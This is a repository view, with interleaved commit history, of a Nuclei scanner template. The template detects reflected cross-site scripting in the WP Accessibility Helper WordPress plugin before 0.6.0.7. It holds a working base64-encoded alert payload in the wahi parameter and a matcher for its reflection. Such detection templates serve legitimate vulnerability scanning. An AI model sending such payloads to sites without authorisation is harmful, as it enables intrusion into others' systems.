daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/wordpress/accessibility-helper-xss.yaml

32 lines
869 B
YAML
Raw Normal View History

Update and rename wp-accessibility-helper-xss.yaml to accessibility-helper-xss.yaml
2022-02-22 07:50:05 +00:00
id: accessibility-helper-xss
Create wp-accessibility-helper-xss.yaml
2022-02-19 11:13:05 +00:00
info:
name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
author: dhiyaneshDK
severity: medium
description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
reference:
- https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
Create wp-accessibility-helper-xss.yaml
2022-02-19 11:13:05 +00:00
tags: xss,wordpress,wp-plugin,wp
requests:
- method: GET
path:
Update and rename wp-accessibility-helper-xss.yaml to accessibility-helper-xss.yaml
2022-02-22 07:50:05 +00:00
- '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
Create wp-accessibility-helper-xss.yaml
2022-02-19 11:13:05 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
Update and rename wp-accessibility-helper-xss.yaml to accessibility-helper-xss.yaml
2022-02-22 07:50:05 +00:00
- "var wah_target_src = '';alert(document.domain);//';"
Create wp-accessibility-helper-xss.yaml
2022-02-19 11:13:05 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200